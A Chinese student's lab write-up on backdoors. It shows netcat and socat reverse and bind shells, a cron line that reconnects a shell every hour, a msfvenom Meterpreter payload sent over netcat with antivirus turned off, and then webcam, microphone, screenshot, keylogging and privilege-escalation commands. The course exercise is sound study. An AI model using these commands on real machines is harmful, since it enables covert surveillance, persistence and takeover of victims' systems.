20154332 Exp2 后门原理与实践

实践内容

  • 使用netcat和socat、msf-meterpreter等工具获得主机权限,并进行一些恶意行为,如监控摄像头、记录键盘输入、截屏等。

实践过程

netcat

netcat获取主机操作Shell,cron启动

(1)
windows获得linux的shell

  • 我们首先找到本机的IP地址
    windows平台下利用cmd的ipconfig命令查看到本机的ip地址
    主机:172.30.5.189

  • windows下使用ncat.exe -l -p 4332命令运行ncat.exe监听4332端口。

  • kali下使用为nc 172.30.5.189(即主机ip) 4332 -e /bin/sh命令连接windows的4332端口。

  • 连接成功后,我们就可以在windows主机获取kali的信息,如输入ls命令:


(2)
linux获得windows的shell

  • 准备阶段
    和上一步骤相同手下找到虚拟机的IP
    由下图可知
    虚拟机IP地址:192.168.229.128

  • kali下使用nc -l -p 4327命令监听4332端口。

  • 为了保障实验的顺利,先测试主机与虚拟机是否接通。

  • windows下使用ncat.exe -e cmd.exe 192.168.229.128 4332(即kali的IP地址)连接kali的4332端口。

  • 连接成功后,我们就可以在kali主机获取windows的信息,此时已成功获取windows的shell。


(3)使用netcat传输数据

  • windows下使用ncat.exe -l -p 4332命令运行ncat.exe监听4332端口。

  • kali下使用为nc 172.30.5.189(即主机ip) 4332命令连接windows的4332端口。
    建立连接后,尝试传输。



(4)cron启动

  • windows下使用ncat.exe -l -p 4332命令运行ncat.exe监听4332端口。

  • kali下使用crontab -e命令

  • 设置一条定时指令,我在做实验的时间是17:27,所以我设置成在每小时的第29分钟反向连接windows主机的4332端口。

29 * * * * /bin/netcat 172.30.5.189 4332 -e /bin/sh

  • 29分时连接成功,成功获得linux的shell,输入ls指令查看。


socat

socat获取主机操作Shell, 任务计划启动。

  • windows下在控制面板->管理工具->任务计划程序中新建一个触发器。

  • 再新建一个操作,程序路径选择socat.exe的安装路径,填写参数tcp-listen:4332 exec:cmd.exe,pty,stderr

  • 待屏幕锁定或使用windows徽标+L键后,刷新任务,可看到任务已经开始执行。

  • kali下使用socat -tcp:172.30.5.189(即主机ip):4332(端口),此时已成功获取windows的shell。


msf-meterpreter

msf-meterpreter 生成后门,传输到靶机获取shell

  • 在kali下输入命令:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.229.128 LPORT=4332 -f exe > 20154332.exe 生成一个名为20154332的后门程序

  • 使用netcat将这个后门程序传输到windows主机上,首先我们在windows下输入ncat.exe -lv 4332 > 20154332.exe

  • 随后在Linux下使用ncat -nv 172.30.6.204 4332 < 20154332.exe命令把文件传送过去

  • 关闭所有的杀毒软件

使用msf获取目标摄像头,进行录屏、键盘记录等操作

  • 首先msf打开监听进程
  • msfconsole //进入msf

  • use exploit/multi/handler //进入handler模式
  • set payload windows/meterpreter/reverse_tcp //设置payload
  • set LHOST 172.30.5.189 //将LHOST设置为LinuxIP地址
  • set LPORT 4332 //设端口为那个4332
  • exploit //

  • 打开Windows上的后门程序:
    20154312_backdoor.exe

此时Kali上已经获得了Windows主机的连接,并且得到了远程控制的shell


  • 使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权
  • 经过了上面的连接后,这一步就显得十分有趣。
  • 使用record_mic指令截获一段音频:

  • 使用webcam_snap指令可以使用摄像头进行拍照:

  • 使用screenshot指令可以进行截屏:



  • 使用keyscan_start指令开始记录下击键的过程
    使用keyscan_dump指令读取击键的记录:

  • 先使用getuid指令查看当前用户,使用getsystem指令进行提权,如图所示,提权成功:


基础问题回答

例举你能想到的一个后门进入到你系统中的可能方式?

  • 下载软件里捆绑的软件
  • 注入在可执行文件里,这是老师上课提到
  • 一些网页链接中。

例举你知道的后门如何启动起来(win及linux)的方式?

  • win:作为一个exe文件藏在我们的主机下,然后可以通过诱导用户主动点击,任务计划来启动后门程序
  • Linux:可以通过对正常软件的绑定注入shellcode达到开启后门的目的。

Meterpreter有哪些给你映像深刻的功能?

  • 最深刻的印象就是可以控制摄像头进行拍照。
  • 其次呢是可以截屏功能,可以在支付密码时进行截屏,窃取密码

如何发现自己有系统有没有被安装后门?

  • 杀毒软件肯定是首要的,虽然大家都觉得没什么用。
  • 通过计算机的入侵检测系统以及防火墙,对系统的行为有一个全面的检测。

实验心得与体会

  • 这次实验很繁琐但是很有趣,在电脑死机又重启死机又重启下坚强的做完了本次实验,在实验中体会最为深刻的就是控制摄像头进行拍照,还有进行远程截屏,在一步一步地和指导书进行,最后达到一些神奇的结果,有很大的成就感。

posted on 2018-03-29 15:39  4332renqing  阅读(97)  评论(0编辑  收藏

导航